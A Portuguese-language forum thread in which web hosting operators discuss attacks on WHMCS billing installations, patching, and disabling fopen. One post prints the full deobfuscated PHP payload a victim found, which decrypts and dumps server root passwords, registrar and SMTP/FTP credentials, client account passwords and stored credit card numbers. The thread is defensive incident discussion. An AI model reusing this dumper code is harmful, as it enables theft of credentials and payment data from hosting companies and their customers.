Se estao usando o fopen pra gravar o arquivo pra upar a shell... não é simples desabilitar o fopen no php.ini?

Isso faz parte daquela configuração básica que o CSF recomenda.

Isso faz parte daquela configuração básica que o CSF recomenda.

Pois é...

aqui eu abri uma conta em um vps que tenho pra teste e instalei o whmcs

tentei de td forma criar o arquivo, pelos codigos q postaram aqui....

nao funfou....

acho que a treita está em desabilitar as funcoes no php.ini, que permitem acesso ao whmcs...

Pessoal me ajude... também aconteceu o mesmo comigo e não é a primeira vez...

Descriptografei o código e olhe o resultado:

include('configuration.php'); $query = mysql_query("SELECT * FROM tblservers"); $text=$text."\r\n######################### HOST ROOTS ###########################\r\n"; while($v = mysql_fetch_array($query)) { $ipaddress = $v['ipaddress']; $username = $v['username']; $type = $v['type']; $active = $v['active']; $hostname = $v['hostname']; $password = decrypt ($v['password'], $cc_encryption_hash); $text=$text."Type $type\r\n"; $text=$text."Active $active\r\n"; $text=$text."Hostname $hostname\r\n"; $text=$text."Ip $ipaddress\r\n"; $text=$text."Username $username\r\n"; $text=$text."Password $password\r\n**************************************\r\n"; } $text=$text."\r\n######################### HOST ROOTS ###########################\r\n"; $text=$text."\r\n######################### Domain Reseller ###########################\r\n"; $query = mysql_query("SELECT * FROM tblregistrars"); while($v = mysql_fetch_array($query)) { $registrar = $v['registrar']; $setting = $v['setting']; $value = decrypt ($v['value'], $cc_encryption_hash); if ($value=="") { $value=0; } $password = decrypt ($v['password'], $cc_encryption_hash); $text=$text."$registrar $setting $value\r\n"; } $text=$text."\r\n######################### Domain Reseller ###########################\r\n"; $text=$text."\r\n######################### FTP +SMTP ###########################\r\n"; $query = mysql_query("SELECT * FROM tblconfiguration where setting='FTPBackupHostname' or setting='FTPBackupUsername' or setting='FTPBackupPassword' or setting='FTPBackupDestination' or setting='SMTPHost' or setting='SMTPUsername' or setting='SMTPPassword' or setting='SMTPPort'"); while($v = mysql_fetch_array($query)) { $value =$v['value']; if ($value=="") { $value=0; } $text=$text.$v['setting']." ".$value."\r\n" ; } $text=$text."\r\n######################### FTP +SMTP ###########################\r\n"; $text=$text."\r\n######################### Payment gateway ###########################\r\n"; $query = mysql_query("SELECT * FROM tblpaymentgateways"); while($v = mysql_fetch_array($query)) { $gateway = $v['gateway']; $setting = $v['setting']; $value = $v['value']; $text=$text."$gateway|$setting|$value\r\n"; } $text=$text."\r\n######################### Payment gateway ###########################\r\n"; $text=$text."\r\n######################### Client R00ts ###########################\r\n"; $query = mysql_query("SELECT * FROM tblhosting where (username = 'root' or username = 'Admin' or username = 'admin' or username = 'Administrator' or username = 'administrator') and domainstatus='Active'"); while($v = mysql_fetch_array($query)) { $text=$text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt ($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n"; } $text=$text."\r\n######################### Client R00ts ###########################\r\n"; $text=$text."\r\n######################### Client HOST ###########################\r\n"; $query = mysql_query("SELECT * FROM tblhosting where domainstatus='Active'"); while($v = mysql_fetch_array($query)) { if (($v['username'] ) and ($v['password'])) { $text=$text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt ($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n"; } } $text=$text."\r\n######################### Client HOST ###########################\r\n"; $text=$text."\r\n######################### Client CC ###########################\r\n"; $query = mysql_query("SELECT * FROM `tblclients` WHERE cardtype <> '' order by issuenumber desc"); while($v = mysql_fetch_array($query)) { $cchash = md5( $cc_encryption_hash.$v['0']); $s= mysql_query("select cardtype,AES_DECRYPT(cardnum,'{$cchash}') as cardnum,AES_DECRYPT(expdate,'{$cchash}') as expdate,AES_DECRYPT(issuenumber,'{$cchash}') as issuenumber,AES_DECRYPT(startdate,'{$cchash}') as startdate,country,email,firstname,lastname,address1,city,state,postcode,phonenumber FROM `tblclients` where id='".$v['0']."'" ); $country = $v['country']; $email = $v['email']; $firstname = $v['firstname']; $lastname = $v['lastname']; $address1 = $v['address1']; $city = $v['city']; $state = $v['state']; $postcode = $v['postcode']; $phonenumber = $v['phonenumber']; $v2=mysql_fetch_array($s); $text=$text."\r\n".$v2[0]."|".$v2[1]."|".$v2[2]."|".$v2[3]."|".$v2[4]." $firstname $lastname ~ $address1:$city:$state:$postcode:$phonenumber $country $email\r\n"; } $text=$text."\r\n######################### Client CC ###########################\r\n"; echo($text);

O que pode ter acontecido?

PS.: Estou usando a última versão

@rangelalvess Sua nova versão está com atualizada com o novo patch ?

Não me aguentei, vejam isso:

Agora pouco, entra um Argentino em meu site, e vai direto para a Central do Cliente criar um ticket, adivinhem o que eu tenha suposto que seria?

Vejam as capturas de tela

Como vocês podem ver, ele estava utilizando proxy, e pesquisou no bing.com por br/clientarea.php

Graças ao script "salvador" do Edvan, este ataque foi bloqueado.

Mas aí vem uma pergunta, POR QUE o BRASIL?

Essa semana também sofri um, só que o IP era de Morocco

Essa semana também sofri um, só que o IP era de Morocco

Pois é, só que no meu caso, o melhante procurou WHMCS brasileiro

Mas aí vem uma pergunta, POR QUE o BRASIL?

Quando esta onda de ataques começou, eu procurei informações sobre a falha e o método utilizado pelos invasores. Um dos conteúdos que eu encontrei foi um fórum onde estavam compartilhando o programinha utilizado nos ataques.

Lá o cara que disponibilizou o programa havia avisado que a maioria das empresas grandes (que utilizam o WHMCS) já haviam aplicado o patch de segurança (disponibilizado pelo Matt). Então ele indicou que os ataques fossem feitos em empresas/domínios menos importantes. Inclusive sugerindo .br

Talvez seja por isso que nós tivemos muitos ataques aqui no Brasil. -_-

Mas quem aplicou o patch já está seguro.

Estas tentativas de agora são só de "retardatários" à procura de empresas que ainda não tenham aplicado o patch (que nessa altura do campeonato espero que sejam pouquíssimas, ou nenhuma). ;)

Quando esta onda de ataques começou, eu procurei informações sobre a falha e o método utilizado pelos invasores. Um dos conteúdos que eu encontrei foi um fórum onde estavam compartilhando o programinha utilizado nos ataques.

Lá o cara que disponibilizou o programa havia avisado que a maioria das empresas grandes (que utilizam o WHMCS) já haviam aplicado o patch de segurança (disponibilizado pelo Matt). Então ele indicou que os ataques fossem feitos em empresas/domínios menos importantes. Inclusive sugerindo .br

Talvez seja por isso que nós tivemos muitos ataques aqui no Brasil. -_-

Mas quem aplicou o patch já está seguro.

Estas tentativas de agora são só de "retardatários" à procura de empresas que ainda não tenham aplicado o patch (que nessa altura do campeonato espero que sejam pouquíssimas, ou nenhuma). ;)

Mas para quem está instalando o WHMCS agora, ele já ve com este patch certo?

Mas para quem está instalando o WHMCS agora, ele já ve com este patch certo?

Sim, as novas instalações já tem o patch incluso.